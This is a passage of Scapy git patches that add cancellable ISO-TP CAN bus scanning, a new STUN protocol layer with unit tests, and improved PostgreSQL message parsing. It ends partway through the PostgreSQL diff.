@@ def scan(sock, # type: SuperSocket sniff_time=0.1, # type: float extended_can_id=False, # type: bool verify_results=True, # type: bool + stop_event=None # type: Optional[Event] ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan and return dictionary of detections @@ -171,27 +176,34 @@ def scan(sock, # type: SuperSocket :param extended_can_id: Send extended can frames :param verify_results: Verify scan results. This will cause a second scan of all possible candidates for ISOTP Sockets + :param stop_event: Event object to asynchronously stop the scan :return: Dictionary with all found packets """ return_values = dict() # type: Dict[int, Tuple[Packet, int]] for value in scan_range: + if stop_event is not None and stop_event.is_set(): + break if noise_ids and value in noise_ids: continue sock.send(get_isotp_packet(value, False, extended_can_id)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, return_values, noise_ids, False, pkt), - timeout=sniff_time, store=False, chainCC=True) + timeout=sniff_time, store=False) if not verify_results: return return_values cleaned_ret_val = dict() # type: Dict[int, Tuple[Packet, int]] for tested_id in return_values.keys(): + if stop_event is not None and stop_event.is_set(): + break for value in range(max(0, tested_id - 2), tested_id + 2, 1): + if stop_event is not None and stop_event.is_set(): + break sock.send(get_isotp_packet(value, False, extended_can_id)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, noise_ids, False, pkt), - timeout=sniff_time * 10, store=False, chainCC=True) + timeout=sniff_time * 10, store=False) return cleaned_ret_val @@ -203,6 +215,7 @@ def scan_extended(sock, # type: SuperSocket noise_ids=None, # type: Optional[List[int]] sniff_time=0.1, # type: float extended_can_id=False, # type: bool + stop_event=None # type: Optional[Event] ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan with ISOTP extended addresses and return dictionary of detections @@ -219,6 +232,7 @@ def scan_extended(sock, # type: SuperSocket :param sniff_time: time the scan waits for isotp flow control responses after sending a first frame :param extended_can_id: Send extended can frames + :param stop_event: Event object to asynchronously stop the scan :return: Dictionary with all found packets """ return_values = dict() # type: Dict[int, Tuple[Packet, int]] @@ -233,18 +247,24 @@ def scan_extended(sock, # type: SuperSocket id_list = [] # type: List[int] r = list(extended_scan_range) for ext_isotp_id in range(r[0], r[-1], scan_block_size): + if stop_event is not None and stop_event.is_set(): + break send_multiple_ext(sock, ext_isotp_id, pkt, scan_block_size) sock.sniff(prn=lambda p: get_isotp_fc(ext_isotp_id, id_list, noise_ids, True, p), - timeout=sniff_time * 3, store=False, chainCC=True) + timeout=sniff_time * 3, store=False) # sleep to prevent flooding time.sleep(sniff_time) # remove duplicate IDs id_list = list(set(id_list)) for ext_isotp_id in id_list: + if stop_event is not None and stop_event.is_set(): + break for ext_id in range(max(ext_isotp_id - 2, 0), min(ext_isotp_id + scan_block_size + 2, 256)): + if stop_event is not None and stop_event.is_set(): + break pkt.extended_address = ext_id full_id = (value << 8) + ext_id sock.send(pkt) @@ -252,7 +272,7 @@ def scan_extended(sock, # type: SuperSocket return_values, noise_ids, True, pkt), - timeout=sniff_time * 2, store=False, chainCC=True) + timeout=sniff_time * 2, store=False) return return_values @@ -267,7 +287,8 @@ def isotp_scan(sock, # type: SuperSocket can_interface=None, # type: Optional[str] extended_can_id=False, # type: bool verify_results=True, # type: bool - verbose=False # type: bool + verbose=False, # type: bool + stop_event=None # type: Optional[Event] ): # type: (...) -> Union[str, List[SuperSocket]] """Scan for ISOTP Sockets on a bus and return findings @@ -296,6 +317,7 @@ def isotp_scan(sock, # type: SuperSocket :param verify_results: Verify scan results. This will cause a second scan of all possible candidates for ISOTP Sockets :param verbose: displays information during scan + :param stop_event: Event object to asynchronously stop the scan :return: """ if verbose: @@ -310,8 +332,7 @@ def isotp_scan(sock, # type: SuperSocket background_pkts = sock.sniff( timeout=noise_listen_time, - started_callback=lambda: sock.send(dummy_pkt), - chainCC=True) + started_callback=lambda: sock.send(dummy_pkt)) noise_ids = list(set(pkt.identifier for pkt in background_pkts)) @@ -320,13 +341,15 @@ def isotp_scan(sock, # type: SuperSocket extended_scan_range=extended_scan_range, noise_ids=noise_ids, sniff_time=sniff_time, - extended_can_id=extended_can_id) + extended_can_id=extended_can_id, + stop_event=stop_event) else: found_packets = scan(sock, scan_range, noise_ids=noise_ids, sniff_time=sniff_time, extended_can_id=extended_can_id, - verify_results=verify_results) + verify_results=verify_results, + stop_event=stop_event) filter_periodic_packets(found_packets) diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index dc57047f2f5..05bddd3fc4c 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -8,7 +8,6 @@ # scapy.contrib.description = ISO-TP (ISO 15765-2) Utilities # scapy.contrib.status = library -import logging import struct from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict, Any, \ @@ -21,9 +20,6 @@ import scapy.libs.six as six -log_isotp = logging.getLogger("scapy.contrib.isotp") - - class ISOTPMessageBuilderIter(object): """ Iterator class for ISOTPMessageBuilder diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index 662c3a270c9..aacadf231c2 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -10,26 +10,24 @@ import sys import signal import re +import threading from ast import literal_eval import scapy.libs.six as six from scapy.config import conf from scapy.consts import LINUX +from scapy.compat import Tuple, Optional, Any if six.PY2 or not LINUX or conf.use_pypy: conf.contribs['CANSocket'] = {'use-python-can': True} from scapy.contrib.cansocket import CANSocket, PYTHON_CAN # noqa: E402 -from scapy.contrib.isotp import isotp_scan # noqa: E402 - - -def signal_handler(sig, frame): - print('Interrupting scan!') - sys.exit(0) +from scapy.contrib.isotp import isotp_scan # noqa: E402 def usage(is_error): + # type: (bool) -> None print('''usage:\tisotpscanner [-i interface] [-c channel] [-a python-can_args] [-n NOISE_LISTEN_TIME] [-t SNIFF_TIME] [-x|--extended] [-C|--piso] [-v|--verbose] [-h|--help] @@ -72,6 +70,7 @@ def usage(is_error): def create_socket(python_can_args, interface, channel): + # type: (Optional[str], Optional[str], str) -> Tuple[CANSocket, str] if PYTHON_CAN: if python_can_args: @@ -96,6 +95,7 @@ def create_socket(python_can_args, interface, channel): def main(): + # type: () -> None extended = False piso = False verbose = False @@ -179,7 +179,15 @@ def main(): if verbose: print("Start scan (%s - %s)" % (hex(start), hex(end))) + stop_event = threading.Event() + + def signal_handler(*args): + # type: (Any) -> None + print('Interrupting scan!') + stop_event.set() + signal.signal(signal.SIGINT, signal_handler) + signal.signal(signal.SIGTERM, signal_handler) result = isotp_scan(sock, range(start, end + 1), @@ -189,7 +197,8 @@ def main(): output_format="code" if piso else "text", can_interface=interface_string, extended_can_id=extended_can_id, - verbose=verbose) + verbose=verbose, + stop_event=stop_event) print("Scan: \n%s" % result) diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 3ed6f9c80d5..1af5dcef0fa 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -6,10 +6,6 @@ = Imports from scapy.contrib.isotp.isotp_scanner import send_multiple_ext, filter_periodic_packets, scan_extended, scan from test.testsocket import TestSocket -from scapy.contrib.isotp.isotp_utils import log_isotp -import logging - -log_isotp.setLevel(logging.DEBUG) with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: exec(f.read()) From 72139e4eaec04d5caf1bc51148674895d5bdb862 Mon Sep 17 00:00:00 2001 From: Pavel Oborin Date: Mon, 29 Aug 2022 13:12:19 +0300 Subject: [PATCH 0872/1632] Add STUN Support (#3709) * STUN Binding method packets * STUN: XOR'ed ip:port in XOR-MAPPED-ADDRESS * Cleanup && MAGIC_COOKIE added && Other minor fixes * Added review suggestions - use `cls` in `dispatch_hook` instead of string. * Fix linter errors * Remove f-string for python2.7 compatibility. Fix E501 * replaced (from|to)_bytes with struct for python2 * Proper RFC number --- scapy/contrib/stun.py | 263 ++++++++++++++++++++++++++++++++++++++++++ test/contrib/stun.uts | 138 ++++++++++++++++++++++ 2 files changed, 401 insertions(+) create mode 100644 scapy/contrib/stun.py create mode 100644 test/contrib/stun.uts diff --git a/scapy/contrib/stun.py b/scapy/contrib/stun.py new file mode 100644 index 00000000000..92876c4a077 --- /dev/null +++ b/scapy/contrib/stun.py @@ -0,0 +1,263 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Pavel Oborin + +# RFC 8489 +# scapy.contrib.description = Session Traversal Utilities for NAT (STUN) +# scapy.contrib.status = loads + +""" + STUN (RFC 8489) + + TLV code derived from the DTP implementation: + Thanks to Nicolas Bareil, + Arnaud Ebalard, + Jochen Bartl. +""" +import struct +import itertools + +from scapy.layers.inet import UDP, TCP +from scapy.config import conf +from scapy.packet import Packet, bind_layers +from scapy.utils import inet_ntoa, inet_aton +from scapy.fields import ( + BitField, + BitEnumField, + LenField, + IntField, + PadField, + StrLenField, + PacketListField, + XShortField, + FieldLenField, + ShortField, + ByteEnumField, + ByteField, + XNBytesField, + XLongField, + XIntField, + XBitField, + IPField +) + +MAGIC_COOKIE = 0x2112A442 + +_stun_class = { + "request": 0b00, + "indication": 0b01, + "success response": 0b10, + "error response": 0b11 +} + +_stun_method = { + "Binding": 0b000000000001 +} + +# fmt: off +_stun_message_type = { + "{} {}".format(method, class_): + (method_code & 0b000000001111) | # noqa: E221,W504 + (class_code & 0b01) << 4 | # noqa: E221,W504 + (method_code & 0b000001110000) << 5 | # noqa: E221,W504 + (class_code & 0b10) << 7 | # noqa: E221,W504 + (method_code & 0b111110000000) << 9 + for (method, method_code), (class_, class_code) in + itertools.product(_stun_method.items(), _stun_class.items()) # noqa: E131 +} +# fmt: on + + +class STUNGenericTlv(Packet): + name = "STUN Generic TLV" + + fields_desc = [ + XShortField("type", 0x0000), + FieldLenField("length", None, length_of="value"), + PadField(StrLenField("value", "", length_from=lambda pkt:pkt.length), align=4) + ] + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kwargs): + if _pkt and len(_pkt) >= 2: + t = struct.unpack("!H", _pkt[:2])[0] + return _stun_tlv_class.get(t, cls) + return cls + + def guess_payload_class(self, payload): + return conf.padding_layer + + +class STUNUsername(STUNGenericTlv): + name = "STUN Username" + + fields_desc = [ + XShortField("type", 0x0006), + FieldLenField("length", None, length_of="username"), + PadField( + StrLenField("username", '', length_from=lambda pkt: pkt.length), + align=4, padwith=b"\x20" + ) + ] + + +class STUNMessageIntegrity(STUNGenericTlv): + name = "STUN Message Integrity" + + fields_desc = [ + XShortField("type", 0x0008), + ShortField("length", 20), + XNBytesField("hmac_sha1", 0, 20) + ] + + def post_build(self, pkt, pay): + pkt += pay + return pkt + + +class STUNPriority(STUNGenericTlv): + name = "STUN Priority" + + fields_desc = [ + XShortField("type", 0x0024), + ShortField("length", 4), + IntField("priority", 0) + ] + + +_xor_mapped_address_family = { + "IPv4": 0x01, + "IPv6": 0x02 +} + + +class XorPort(ShortField): + + def m2i(self, pkt, x): + return x ^ (MAGIC_COOKIE >> 16) + + def i2m(self, pkt, x): + return x ^ (MAGIC_COOKIE >> 16) + + +class XorIp(IPField): + + def m2i(self, pkt, x): + return inet_ntoa(struct.pack(">i", (struct.unpack(">i", x)[0] ^ MAGIC_COOKIE))) + + def i2m(self, pkt, x): + if x is None: + return b"\x00\x00\x00\x00" + return struct.pack(">i", struct.unpack(">i", inet_aton(x)) ^ MAGIC_COOKIE) + + +class STUNXorMappedAddress(STUNGenericTlv): + name = "STUN XOR Mapped Address" + + fields_desc = [ + XShortField("type", 0x0020), + ShortField("length", 8), + ByteField("RESERVED", 0), + ByteEnumField("address_family", 1, _xor_mapped_address_family), + XorPort("xport", 0), + XorIp("xip", 0) # FIXME <- only IPv4 addresses will work + ] + + +class STUNUseCandidate(STUNGenericTlv): + name = "STUN Use Candidate" + + fields_desc = [ + XShortField("type", 0x0025), + FieldLenField("length", 0, length_of="value"), + PadField(StrLenField("value", "", length_from=lambda pkt: pkt.length), align=4) + ] + + +class STUNFingerprint(STUNGenericTlv): + name = "STUN Fingerprint" + + fields_desc = [ + XShortField("type", 0x8028), + ShortField("length", 4), + XIntField("crc_32", None) + ] + + +class STUNIceControlling(STUNGenericTlv): + name = "STUN ICE-controlling" + + fields_desc = [ + XShortField("type", 0x802a), + ShortField("length", 8), + XLongField("tie_breaker", None) + ] + + +class STUNGoogNetworkInfo(STUNGenericTlv): + name = "STUN Google Network Info" + + fields_desc = [ + XShortField("type", 0xc057), + ShortField("length", 4), + ShortField("network_id", 0), + ShortField("network_cost", 999) + ] + + +_stun_tlv_class = { + 0x0006: STUNUsername, + 0x0008: STUNMessageIntegrity, + 0x0020: STUNXorMappedAddress, + 0x0025: STUNUseCandidate, + 0x0024: STUNPriority, + 0x8028: STUNFingerprint, + 0x802a: STUNIceControlling, + 0xc057: STUNGoogNetworkInfo +} + +_stun_tlv_attribute_types = { + "MAPPED-ADDRESS": 0x0001, + "USERNAME": 0x0006, + "MESSAGE-INTEGRITY": 0x0008, + "ERROR-CODE": 0x0009, + "UNKNOWN-ATTRIBUTES": 0x000A, + "REALM": 0x0014, + "NONCE": 0x0015, + "XOR-MAPPED-ADDRESS": 0x0020, + "PRIORITY": 0x0024, + "USE-CANDIDATE": 0x0025, + "SOFTWARE": 0x8022, + "ALTERNATE-SERVER": 0x8023, + "FINGERPRINT": 0x8028, + "ICE-CONTROLLED": 0x8029, + "ICE-CONTROLLING": 0x802a, + "GOOG-NETWORK-INFO": 0xc057 +} + + +class STUN(Packet): + description = "" + + fields_desc = [ + BitField('RESERVED', 0b00, size=2), # <- always zeroes + BitEnumField('stun_message_type', None, 14, _stun_message_type), + LenField('length', None, fmt='!h'), + XIntField('magic_cookie', MAGIC_COOKIE), + XBitField('transaction_id', None, 96), + PacketListField("attributes", [], STUNGenericTlv) + ] + + def post_build(self, pkt, pay): + pkt += pay + if self.length is None: + pkt = pkt[:2] + struct.pack("!h", len(pkt) - 20) + pkt[4:] + for attr in self.tlvlist: + if isinstance(attr, STUNMessageIntegrity): + pass # TODO Fill hmac-sha1 in MESSAGE-INTEGRITY attribute + return pkt + + +bind_layers(UDP, STUN, dport=3478) +bind_layers(TCP, STUN, dport=3478) diff --git a/test/contrib/stun.uts b/test/contrib/stun.uts new file mode 100644 index 00000000000..2a22a690248 --- /dev/null +++ b/test/contrib/stun.uts @@ -0,0 +1,138 @@ +# STUN unit tests +# run with: +# test/run_tests -P "load_contrib('stun')" -t test/contrib/stun.uts -F + +% STUN regression tests for Scapy + +############ +# STUN +############ + ++ STUN Binding messages + += test STUN binding request 1 + +raw = b"\x00\x01\x00\x64\x21\x12\xa4\x42\xcf\xac\xb2\xa4\x3a\xa2\xde\x5a" \ + b"\x9d\x56\xd8\x5a\x00\x25\x00\x00\x00\x24\x00\x04\x6e\x20\x00\xff" \ + b"\x80\x2a\x00\x08\x1b\x0a\xb9\x8b\x6e\x8e\xff\xa6\x00\x06\x00\x25" \ + b"\x6f\x4e\x70\x68\x3a\x48\x74\x31\x31\x4d\x61\x52\x5a\x48\x63\x34" \ + b"\x47\x4f\x4c\x4a\x55\x73\x62\x75\x31\x52\x33\x59\x43\x73\x37\x32" \ + b"\x48\x59\x4e\x32\x35\x20\x20\x20\x00\x08\x00\x14\xfc\xbc\x47\x21" \ + b"\x68\x1f\xdb\x59\x91\x33\x42\xbe\x96\x19\x9e\x7f\x3e\xf0\xe7\x77" \ + b"\x80\x28\x00\x04\x87\x18\xc3\xa4" + +parsed = STUN(raw) +assert parsed.RESERVED == 0x00, parsed.RESERVED +assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding request" +assert parsed.length == 100 +assert parsed.magic_cookie == 0x2112A442 +assert parsed.transaction_id == 0xcfacb2a43aa2de5a9d56d85a, parsed.transaction_id +assert parsed.attributes == [ + STUNUseCandidate(), + STUNPriority(priority=1847591167), + STUNIceControlling(tie_breaker=0x1b0ab98b6e8effa6), + STUNUsername(length=37, username="oNph:Ht11MaRZHc4GOLJUsbu1R3YCs72HYN25"), + STUNMessageIntegrity(hmac_sha1=0x77e7f03e7f9e1996be42339159db1f682147bcfc), + STUNFingerprint(crc_32=0x8718c3a4) +] + += test STUN binding request 2 + +raw = b"\x00\x01\x00\x6c\x21\x12\xa4\x42\x34\x79\x47\x65\x34\x63\x59\x36" \ + b"\x31\x6a\x79\x6a\x00\x06\x00\x25\x48\x74\x31\x31\x4d\x61\x52\x5a" \ + b"\x48\x63\x34\x47\x4f\x4c\x4a\x55\x73\x62\x75\x31\x52\x33\x59\x43" \ + b"\x73\x37\x32\x48\x59\x4e\x32\x35\x3a\x6f\x4e\x70\x68\x00\x00\x00" \ + b"\xc0\x57\x00\x04\x00\x00\x03\xe7\x80\x2a\x00\x08\xa6\x96\x81\x9e" \ + b"\x91\xc9\x37\xda\x00\x25\x00\x00\x00\x24\x00\x04\x6e\x00\x1e\xff" \ + b"\x00\x08\x00\x14\xc1\x87\xaa\xfa\xb1\xe0\xf3\x12\x31\x43\x3a\xb1" \ + b"\x4d\x67\x6b\xc7\xb9\x89\xbd\x5f\x80\x28\x00\x04\xc9\x56\x6c\xfc" + +parsed = STUN(raw) +assert parsed.RESERVED == 0x00, parsed.RESERVED +assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding request" +assert parsed.length == 108 +assert parsed.magic_cookie == 0x2112A442 +assert parsed.transaction_id == 0x3479476534635936316a796a +assert parsed.attributes == [ + STUNUsername(length=37, username='Ht11MaRZHc4GOLJUsbu1R3YCs72HYN25:oNph'), + STUNGoogNetworkInfo(), + STUNIceControlling(tie_breaker=0xa696819e91c937da), + STUNUseCandidate(), + STUNPriority(priority=1845501695), + STUNMessageIntegrity(hmac_sha1=0x5fbd89b9c76b674db13a433112f3e0b1faaa87c1), + STUNFingerprint(crc_32=0xc9566cfc) + +] + += test STUN binding success response 1 + +raw = b"\x01\x01\x00\x2c\x21\x12\xa4\x42\xcf\xac\xb2\xa4\x3a\xa2\xde\x5a" \ + b"\x9d\x56\xd8\x5a\x00\x20\x00\x08\x00\x01\xbf\x32\x8d\x06\xa4\x68" \ + b"\x00\x08\x00\x14\xb7\x1f\xc9\x23\x58\x97\xc8\x02\xe3\xff\xf8\xe3" \ + b"\xd8\x89\xfa\x41\x42\x8d\x96\x7d\x80\x28\x00\x04\xea\x9b\x65\x59" + +parsed = STUN(raw) +assert parsed.RESERVED == 0x00, parsed.RESERVED +assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding success response" +assert parsed.length == 44 +assert parsed.magic_cookie == 0x2112A442 +assert parsed.transaction_id == 0xcfacb2a43aa2de5a9d56d85a, parsed.transaction_id +assert parsed.attributes == [ + STUNXorMappedAddress(xport=40480, xip="172.20.0.42"), + STUNMessageIntegrity(hmac_sha1=0x7d968d4241fa89d8e3f8ffe302c8975823c91fb7), + STUNFingerprint(crc_32=0xea9b6559) +] + += test STUN binding success response 2 + +raw = b"\x01\x01\x00\x58\x21\x12\xa4\x42\x34\x79\x47\x65\x34\x63\x59\x36" \ + b"\x31\x6a\x79\x6a\x00\x20\x00\x08\x00\x01\x40\xba\x8d\x06\xa4\x8a" \ + b"\x00\x06\x00\x25\x48\x74\x31\x31\x4d\x61\x52\x5a\x48\x63\x34\x47" \ + b"\x4f\x4c\x4a\x55\x73\x62\x75\x31\x52\x33\x59\x43\x73\x37\x32\x48" \ + b"\x59\x4e\x32\x35\x3a\x6f\x4e\x70\x68\x20\x20\x20\x00\x08\x00\x14" \ + b"\x4b\x67\x03\x6d\xfb\x65\xca\x84\xd6\x3b\xca\xc8\x6c\x8d\x59\x81" \ + b"\xdf\x65\x70\x31\x80\x28\x00\x04\x40\x41\xe9\xc3" + +parsed = STUN(raw) +assert parsed.RESERVED == 0x00, parsed.RESERVED +assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding success response" +assert parsed.length == 88 +assert parsed.magic_cookie == 0x2112A442 +assert parsed.transaction_id == 0x3479476534635936316a796a, parsed.transaction_id +assert parsed.attributes[0] == STUNXorMappedAddress(xport=25000, xip="172.20.0.200"), parsed.attributes +assert parsed.attributes == [ + STUNXorMappedAddress(xport=25000, xip="172.20.0.200"), + STUNUsername(length=37, username="Ht11MaRZHc4GOLJUsbu1R3YCs72HYN25:oNph"), + STUNMessageIntegrity(hmac_sha1=0x317065df81598d6cc8ca3bd684ca65fb6d03674b), + STUNFingerprint(crc_32=0x4041e9c3) +] + += test STUN binding indication 1 + +raw = b"\x00\x11\x00\x08\x21\x12\xa4\x42\x29\x3d\x68\x7b\x0f\xbc\x44\x7c" \ + b"\x01\xb5\x8d\x2e\x80\x28\x00\x04\xc8\x84\xfe\x99" + +parsed = STUN(raw) +assert parsed.RESERVED == 0x00, parsed.RESERVED +assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding indication" +assert parsed.length == 8 +assert parsed.magic_cookie == 0x2112A442 +assert parsed.transaction_id == 0x293d687b0fbc447c01b58d2e, parsed.transaction_id +assert parsed.attributes == [ + STUNFingerprint(crc_32=0xc884fe99) +] + += test STUN binding indication 2 + +raw = b"\x00\x11\x00\x08\x21\x12\xa4\x42\x1d\x93\x57\xa1\xe9\x4a\x20\x51" \ + b"\x27\x19\x96\xd9\x80\x28\x00\x04\x53\x80\x0d\x81" + +parsed = STUN(raw) +assert parsed.RESERVED == 0x00, parsed.RESERVED +assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding indication" +assert parsed.length == 8 +assert parsed.magic_cookie == 0x2112A442 +assert parsed.transaction_id == 0x1d9357a1e94a2051271996d9, parsed.transaction_id +assert parsed.attributes == [ + STUNFingerprint(crc_32=0x53800d81) +] From 9b5dd4bf048c575190554a4b6922229811e21cc9 Mon Sep 17 00:00:00 2001 From: John Rollinson Date: Mon, 29 Aug 2022 15:26:30 -0400 Subject: [PATCH 0873/1632] Improve parsing for scapy.contrib.postgres (#3715) * Improve parsing for scapy.contrib.postgres This fixes two major usability issues with the existing code: 1) Parsing of Bind messages 2) Proper reassembly of multi-packet message groups Additionally, it makes minor changes to some of the existing code that was causing bad parsing on real server traffic mostly focused on length/count calculations. Known bugs: - This may error out on asynchronous server-generated messages (e.g. NoticeResponse & NotificationResponse) because of the simplified logic in `tcp_reassemble`. - Does not handle FunctionCall messages. This was not implemented in the original code but now it is replaced with a "_Todo" packet that allows parsing to continue for other messages in the stream (message packets follow a consistent TLV format). * Address code review feedback - Update conditional in `tcp_reassemble` functions - Add test that covers `Bind` and `Parse` classes Co-authored-by: John E. Rollinson --- scapy/contrib/postgres.py | 142 ++++++++++++++++++++++---------------- test/contrib/postgres.uts | 67 ++++++++++++++++++ 2 files changed, 149 insertions(+), 60 deletions(-) diff --git a/scapy/contrib/postgres.py b/scapy/contrib/postgres.py index eec7fcc0555..895ad9aa6f7 100644 --- a/scapy/contrib/postgres.py +++ b/scapy/contrib/postgres.py @@ -7,8 +7,7 @@ import struct -from scapy.compat import Optional, Callable, Any, \ - Tuple # noqa: F401 +from scapy.compat import Optional, Callable, Any, Tuple # noqa: F401 from scapy.fields import ( ByteField, CharEnumField, @@ -26,6 +25,7 @@ ) from scapy.packet import Packet, bind_layers from scapy.layers.inet import TCP +from scapy.sessions import TCPSession AUTH_CODES = { 0: "AuthenticationOk", @@ -84,8 +84,7 @@ class Startup(Packet): name = "Startup Request Packet" fields_desc = [ FieldLenField( - "len", None, length_of="options", - fmt="I", adjust=lambda pkt, x: x + 8 + "len", None, length_of="options", fmt="I", adjust=lambda pkt, x: x + 8 ), ShortField("protocol_version_major", 3), ShortField("protocol_version_minor", 0), @@ -120,8 +119,7 @@ def i2m(self, pkt, x): fld, fval = pkt.getfield_and_val(length_of_field) f += fld.i2len(pkt, fval) else: - raise ValueError( - "Field should have either length_of or count_of") + raise ValueError("Field should have either length_of or count_of") x = self.adjust(pkt, f) elif x is None: x = 0 @@ -156,11 +154,9 @@ def randval(self): return ord(self.default) -class _BasePostgres(Packet): +class _BasePostgres(Packet, TCPSession): name = "Regular packet" - fields_desc = [ - PacketListField("contents", [], next_cls_cb=determine_pg_field) - ] + fields_desc = [PacketListField("contents", [], next_cls_cb=determine_pg_field)] @classmethod def tcp_reassemble(cls, data, metadata): @@ -179,13 +175,22 @@ def extract_padding(self, p): return b"", p +class SignedIntStrPair(_ZeroPadding): + name = "Bytes data" + fields_desc = [ + FieldLenField("len", 0, fmt="i", length_of="value"), + StrLenField( + "data", None, length_from=lambda pkt: pkt.len if pkt.len > 0 else 0 + ), + ] + + class Authentication(_ZeroPadding): name = "Authentication Request" fields_desc = [ ByteTagField(b"R"), FieldLenField( - "len", None, length_of="optional", - fmt="I", adjust=lambda pkt, x: x + 8 + "len", None, length_of="optional", fmt="I", adjust=lambda pkt, x: x + 8 ), IntEnumField("method", default=0, enum=AUTH_CODES), StrLenField("optional", None, length_from=lambda pkt: pkt.len - 8), @@ -219,8 +224,7 @@ class Query(_ZeroPadding): fields_desc = [ ByteTagField(b"Q"), FieldLenField( - "len", None, length_of="query", - fmt="I", adjust=lambda pkt, x: x + 5 + "len", None, length_of="query", fmt="I", adjust=lambda pkt, x: x + 5 ), StrNullField("query", None), ] @@ -231,8 +235,7 @@ class CommandComplete(_ZeroPadding): fields_desc = [ ByteTagField(b"C"), FieldLenField( - "len", None, length_of="cmdtag", - fmt="I", adjust=lambda pkt, x: x + 4 + "len", None, length_of="cmdtag", fmt="I", adjust=lambda pkt, x: x + 4 ), StrLenField("cmdtag", "", length_from=lambda pkt: pkt.len - 4), ] @@ -295,28 +298,19 @@ class RowDescription(_ZeroPadding): ] -class SignedIntStrPair(_ZeroPadding): - name = "Bytes data" - fields_desc = [ - FieldLenField("len", None, length_of="data", fmt="I"), - StrLenField("data", None, length_from=lambda pkt: pkt.len), - ] - - class DataRow(_ZeroPadding): name = "Data Row" fields_desc = [ ByteTagField(b"D"), FieldLenField( - "len", None, fmt="I", length_of="data", adjust=lambda pkt, x: x + 6 + "len", None, fmt="I", length_of="data", adjust=lambda pkt, x: len(pkt) - 1 ), - SignedShortField("numfields", 0), + FieldLenField("numfields", 0), PacketListField( "data", [], - pkt_cls=SignedIntStrPair, + SignedIntStrPair, count_from=lambda pkt: pkt.numfields, - length_from=lambda pkt: pkt.len - 6, ), ] @@ -357,8 +351,7 @@ class ErrorResponse(_ZeroPadding): fields_desc = [ ByteTagField(b"E"), FieldLenField( - "len", None, length_of="error_fields", - fmt="I", adjust=lambda pkt, x: x + 5 + "len", None, length_of="error_fields", fmt="I", adjust=lambda pkt, x: x + 5 ), FieldListField( "error_fields", @@ -378,6 +371,39 @@ class Terminate(_ZeroPadding): ] +class _Todo(_ZeroPadding): + name = "Unsupported message" + fields_desc = [ + ByteTagField(b"?"), + FieldLenField("len", None, fmt="I", length_of="body"), + StrLenField("body", None, length_from=lambda pkt: pkt.len - 4), + ] + + +class Bind(_ZeroPadding): + name = "Bind Request" + fields_desc = [ + ByteTagField(b"?"), + FieldLenField( + "len", None, fmt="I", length_of="body", adjust=lambda pkt, x: len(pkt) - 1 + ), + StrNullField("destination", ""), + StrNullField("statement", ""), + FieldLenField("codes_count", 0, fmt="H", count_of="codes"), + FieldListField( + "codes", [], ShortField("", 0), count_from=lambda pkt: pkt.codes_count + ), + FieldLenField("values_count", 0, fmt="H", count_of="values"), + PacketListField( + "values", [], SignedIntStrPair, count_from=lambda pkt: pkt.values_count + ), + FieldLenField("results_count", 0, fmt="H", count_of="results"), + FieldListField( + "results", [], ShortField("", 0), count_from=lambda pkt: pkt.results_count + ), + ] + + class BindComplete(_ZeroPadding): name = "Bind Complete" fields_desc = [ @@ -394,8 +420,7 @@ class Close(_ZeroPadding): fields_desc = [ ByteTagField(b"C"), FieldLenField( - "len", None, fmt="I", length_of="statement", - adjust=lambda pkt, x: x + 6 + "len", None, fmt="I", length_of="statement", adjust=lambda pkt, x: x + 6 ), CharEnumField("close_type", b"S", enum=CLOSE_DESCRIBE_TYPE), StrNullField( @@ -418,8 +443,7 @@ class Describe(_ZeroPadding): fields_desc = [ ByteTagField(b"D"), FieldLenField( - "len", None, fmt="I", length_of="statement", - adjust=lambda pkt, x: x + 6 + "len", None, fmt="I", length_of="statement", adjust=lambda pkt, x: x + 6 ), CharEnumField("close_type", b"S", enum=CLOSE_DESCRIBE_TYPE), StrNullField("statement", ""), @@ -478,13 +502,7 @@ class Parse(_ZeroPadding): name = "Parse Request" fields_desc = [ ByteTagField(b"P"), - _FieldsLenField( - "len", - None, - fmt="I", - length_of=("destination", "query", "params"), - adjust=lambda pkt, x: x + 8, - ), + FieldLenField("len", None, fmt="I", adjust=lambda pkt, x: len(pkt) - 1), StrNullField("destination", ""), StrNullField("query", ""), FieldLenField("num_param_dtypes", None, fmt="H", count_of="params"), @@ -492,7 +510,7 @@ class Parse(_ZeroPadding): "params", [], SignedIntField("param", None), - count_from="num_param_dtypes", + count_from=lambda pkt: pkt.num_param_dtypes, ), ] @@ -502,8 +520,7 @@ class Execute(_ZeroPadding): fields_desc = [ ByteTagField(b"E"), FieldLenField( - "len", None, fmt="I", length_of="portal", - adjust=lambda pkt, x: x + 9 + "len", None, fmt="I", length_of="portal", adjust=lambda pkt, x: x + 9 ), StrNullField( "portal", @@ -525,8 +542,7 @@ class PasswordMessage(_ZeroPadding): fields_desc = [ ByteTagField(b"p"), FieldLenField( - "len", None, fmt="I", length_of="password", - adjust=lambda pkt, x: x + 4 + "len", None, fmt="I", length_of="password", adjust=lambda pkt, x: x + 4 ), StrLenField("password", None, length_from=lambda pkt: pkt.len - 4), ] @@ -537,8 +553,7 @@ class NoticeResponse(_ZeroPadding): fields_desc = [ ByteTagField(b"N"), FieldLenField( - "len", None, length_of="notice_fields", fmt="I", - adjust=lambda pkt, x: x + 5 + "len", None, 